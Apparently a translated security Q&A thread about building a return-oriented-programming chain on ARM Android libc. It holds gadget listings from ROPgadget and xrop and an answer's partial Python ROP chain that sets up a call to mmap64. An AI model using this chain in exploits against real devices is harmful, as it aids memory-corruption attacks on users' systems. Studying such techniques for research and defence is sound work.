Programmazione ROP / Sfruttamento su ARM - Catena di gadget

7

Purtroppo, non riesco a trovare questo gadget nel mio libc.so. Come possiamo riprogrammarlo usando istruzioni diverse:

pop {r0, r1, r2, r3, pc}

Quali istruzioni otterranno lo stesso? Quali gadget devo cercare?

Si riferisce a questo exploit

# pivot swaps stack then returns to pop {pc}
  page += p32(pop_r0_r1_r2_r3_pc)

Grazie,

Aggiornamento:

Questi gadget sono disponibili in my libc.so:

Quale strumento è migliore ROPgadget o xrop? xrop ha mostrato sicuramente più gadget

ROPgadget --binary libc.so --ropchain --only "pop"
Gadgets information
============================================================
0x0001061c : pop {r0, pc}
0x00042664 : pop {r1, pc}
0x00042d00 : pop {r3, pc}
0x0000f7dc : pop {r4, pc}
0x00041658 : pop {r4, r5, pc}
0x0004198c : pop {r4, r5, r6, pc}
0x00042c2c : pop {r4, r5, r6, r7, pc}

E usando xrop:

Usage: xrop [-r arch] [-b bits] [-e bytes] [-l endian] [-a relocaddr] [-s regex] [-v] [-h] inputfile
     -b (16 | 32 | 64) sets the processor mode
     -r (arm | mips | powerpc | x86) raw binary file of given architecture
     -v displays the version number
     -l (b | e) big or little endian
     -e skips <bytes> of header
     -a rellocate at given address
     -n disable colors in the output
     -s filter gadgets with <regex>
     -h prints this menu

$ ./xrop -r arm -b 32 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________

$ ./xrop -r arm -b 64 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________
    
posta android_dev 28.09.2015 - 21:26
fonte

1 risposta

2

Non ho guardato a lungo, ma usando il risultato di 1 + 0x59554 : pop {r0, r1, r2, r6} di xrop e il risultato di 0x00042d00 : pop {r3, pc} di ROPgadget, hai provato a farlo nello stack ROP?

page += p32(pop_r0_r1_r2_r6_pc) #xrop result with loaded offset
page += p32(r0_popval)  #r0 - mmap() address in exploit.
page += p32(r1_popval)  #r1 - size in exploit.
page += p32(r2_popval)  #r2 - protection in exploit.
page += p32(r6_popval)  #r6 - 0x66666666 looks just like recognizable junk.
page += p32(pop_r3_pc)  #ROPgadget result with loaded offset
page += p32(r3_popval)  #r3 - flags for mmap in exploit.
page += p32(mmap64_address)     #for popping into pc to call mmap64(). 

Immagino che farebbe bene se sono gadget validi. Prendi in considerazione anche i gadget Thumb se hai gadget decenti per la ramificazione e lo scambio tra le modalità.

Ho appreso materiale simile, per il quale ROPgadget è andato tutto bene, ma suggerirei di utilizzare qualsiasi altra funzionalità pronta per ottenere ciò che è necessario fare più velocemente. Mi piacerebbe ad esempio la generazione automatizzata di ropchain di ARM in ROPgadget, ma non è una funzionalità.

    
risposta data 17.03.2017 - 05:52
fonte

Leggi altre domande sui tag